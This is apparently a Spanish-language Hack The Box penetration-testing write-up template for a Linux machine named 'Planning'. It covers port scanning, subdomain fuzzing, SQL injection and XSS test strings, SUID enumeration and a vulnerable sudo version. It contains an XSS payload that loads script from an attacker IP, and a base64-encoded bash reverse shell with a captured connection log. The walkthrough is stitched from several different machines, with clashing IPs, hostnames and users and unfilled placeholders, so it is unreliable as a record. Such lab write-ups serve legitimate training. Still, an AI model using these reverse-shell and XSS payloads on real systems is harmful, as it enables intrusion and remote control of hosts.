⚫Report Template - Linux

En esta ocasión vamos a hacer el writeup de la máquina X de Hack the Box, una máquina Linux de dificultad easy.

Información General

• Nombre de la máquina: Planning

• IP: 10.10.11.70

• Sistema operativo: Linux

• Dificultad: 🟢 Fácil | 🟡 Media | 🔴 Difícil (seleccionar)

• Fecha: DD-MM-AAAA

---

Reconocimiento Inicial

Añadimos la IP al /etc/hosts

sudo echo "10.10.11.58 dog.htb" | sudo tee -a /etc/hosts

Escaneo de Puertos

Escaneo Simple

sudo nmap -v -sV -T5 10.10.11.58

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Solo encontramos puertos comunes (22 y 80) abiertos. Nos centraremos en el servicio web.

Escaneo Avanzado

Podemos usar Visual Map importando un escaneo agresivo de Nmap en formato XML para detectar posibles vulnerabilidades o vectores de entrada, y posibles pasos de explotación:

sudo nmap -v -A 10.10.11.58 -oX scan.xml

Análisis con Visual Map

GitHub - afsh4ck/Visual-Map: Professional AI Hacking PlatformGitHub

Resumen de los hallazgos

Acceso Web

Accedemos a http://planning.htb y observamos que parece ser una plataforma de cursos en línea.

Comandos útiles:

host planning.htb
dig planning.htb
curl -I http://planning.htb
whatweb -a3 -v http://planning.htb
netcat -vz planning.htb 1-1000

---

Enumeración Web

Testing de Formularios

• Probar inyecciones SQL y XSS:

  • ' OR '1'='1

  • <script>alert(1)</script>

• Observar mensajes, errores, cambios de comportamiento

• Herramientas: Burp Suite, sqlmap, wfuzz

Probamos distintas técnicas de inyección SQL/XSS sin éxito.

Fuzzing de Directorios

dirsearch -u http://planning.htb -x 404

gobuster dir -u http://planning.htb -w /usr/share/wordlists/dirb/common.txt

ffuf -u http://planning.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

Directorios encontrados:

• /about.php

• /contact.php

• /js/ (403)

• /lib/ (403)

No se encuentran datos sensibles directamente accesibles.

Análisis de vulnerabilidades

nuclei -u planning.htb

---

Enumeración de Subdominios (VHosts)

Comprobación de Content-Length

curl -s -I http://10.10.11.68 -H "Host: defnotvalid.planning.htb" | grep "Content-Length:"

Content-Length: 178

Fuzzing con FFUF

ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt:FUZZ -u http://10.10.11.68/ -H 'Host: FUZZ.planning.htb' -fs 178

Encontramos el subdominio: grafana.planning.htb

Lo añadimos a /etc/hosts y accedemos a un panel de Grafana v11.0.0.

---

Explotación

Prueba de XSS (si hay forms)

Probaremos el siguiente script en los campos del formulario para ver si es vulnerable a Cross Site Scipting (XSS):

 "><script src=http://10.10.14.15:9000/TESTING_THIS</script>

Cambiamos la IP por la nuestra y iniciamos un listener con Netcat en el puerto 9000. Hacemos clic en el botón Send y comprobamos si el listener recibe una llamada para confirmar la vulnerabilidad.

afsh4ck@kali$ nc -lvnp 9000

Investigación de CVEs / Exploits

Exploramos CVEs relacionados con Grafana 11.0.0 en fuentes como:

• https://sploitus.com

• https://exploit-db.com

• https://github.com

Exploit seleccionado: (Describir qué exploit se usó y su URL de referencia)

Ejecución del Exploit

Describir paso a paso cómo se logró la ejecución remota o el primer acceso.

Estabilizar sesión

Usaremos Penelope para estabilizar nuestra sesión y tener persistencia:

GitHub - brightio/penelope: Penelope Shell HandlerGitHub

pipx install git+https://github.com/brightio/penelope

penelope

Usaremos el payload en bash de la sección tun0, ya que estamos conectados por VPN:

➤  tun0 → 10.10.15.3:4444

Bash TCP
printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTUuMy80NDQ0IDA+JjEpICY=|base64 -d|bash

Lo ejecutamos en la máquina objetivo:

nc -nlvp 4444  
listening on [any] 4444 ...
connect to [10.10.15.3] from (UNKNOWN) [10.10.11.92] 50602
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ls
conversor.htb
$ printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTUuMy80NDQ0IDA+JjEpICY=|base64 -d|bash
$ 

Y automáticamente recibimos la shell PTY con persistencia:

Con F12 podemos cerrar la sesión para interactuar con ella más tarde

---

Acceso Inicial

Una vez obtenido acceso:

• Verificar usuario actual (whoami)

• Verificar entorno (uname -a, id, sudo -l)

---

User Flag

Ubicación y obtención de la flag del usuario:

cat /home/<usuario>/user.txt

---

Escalada de Privilegios

Enumeración de Privilegios

No tenemos sudo como el usuario Oliver:

oliver@editor:/tmp$ sudo -l                                                        
[sudo] password for oliver: 
Sorry, user oliver may not run sudo on editor.

Versión de SUDO

ike@expressway:~$ sudo -V
Sudo version 1.9.17

Esta versión de sudo es vulnerable al CVE-2025-32463, y encontramos varios PoC para explotarlo.

Enumeración de archivos con permisos especiales

Buscando archivos con permisos especiales, encontré un archivo ndsudo sospechoso:

oliver@editor:/tmp$ find / -user root -perm -4000 -print 2>/dev/null

/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin

Ver servicios internos corriendo

oliver@editor:/tmp$ ss -tuln

Netid State   Recv-Q  Send-Q        Local Address:Port    Peer Address:Port Process 
udp   UNCONN  0       0                 127.0.0.1:8125         0.0.0.0:*            
udp   UNCONN  0       0             127.0.0.53%lo:53           0.0.0.0:*            
tcp   LISTEN  0       128                 0.0.0.0:22           0.0.0.0:*            
tcp   LISTEN  0       4096          127.0.0.53%lo:53           0.0.0.0:*            
tcp   LISTEN  0       511                 0.0.0.0:80           0.0.0.0:*            
tcp   LISTEN  0       151               127.0.0.1:3306         0.0.0.0:*            
tcp   LISTEN  0       4096              127.0.0.1:19999        0.0.0.0:*            
tcp   LISTEN  0       4096              127.0.0.1:8125         0.0.0.0:*            
tcp   LISTEN  0       4096              127.0.0.1:45249        0.0.0.0:*            
tcp   LISTEN  0       70                127.0.0.1:33060        0.0.0.0:*            
tcp   LISTEN  0       5                   0.0.0.0:8000         0.0.0.0:*            
tcp   LISTEN  0       128                    [::]:22              [::]:*            
tcp   LISTEN  0       511                    [::]:80              [::]:*            
tcp   LISTEN  0       50       [::ffff:127.0.0.1]:8079               *:*            
tcp   LISTEN  0       50                        *:8080               *:*   

Herramientas usadas:

• sudo -l

• find / -perm -4000 2>/dev/null

• linpeas.sh

• pspy

Técnica aplicada

Describir la técnica usada: binario con SUID, cronjob mal configurado, credenciales duras, etc.

---

👑 Root Flag

cat /root/root.txt